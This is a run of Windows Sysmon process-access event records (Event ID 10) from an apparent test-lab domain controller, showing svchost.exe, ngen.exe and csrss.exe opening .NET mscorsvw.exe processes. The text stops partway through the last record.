{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7129,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.304\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-00104E190C00}\r\nTargetProcessId: 4676\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.304","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00104E190C00}","TargetProcessId":"4676","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7130,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.335\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-0010B61C0C00}\r\nTargetProcessId: 880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.335","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-0010B61C0C00}","TargetProcessId":"880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7131,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.335\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-0010B61C0C00}\r\nTargetProcessId: 880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.335","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-0010B61C0C00}","TargetProcessId":"880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7132,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.351\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-0010B61C0C00}\r\nTargetProcessId: 880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.351","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-0010B61C0C00}","TargetProcessId":"880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7133,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.382\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-00104F200C00}\r\nTargetProcessId: 2152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.382","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00104F200C00}","TargetProcessId":"2152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7134,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.382\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-00104F200C00}\r\nTargetProcessId: 2152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.382","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00104F200C00}","TargetProcessId":"2152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7135,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-00104F200C00}\r\nTargetProcessId: 2152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00104F200C00}","TargetProcessId":"2152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7136,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.413\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-001099230C00}\r\nTargetProcessId: 3900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 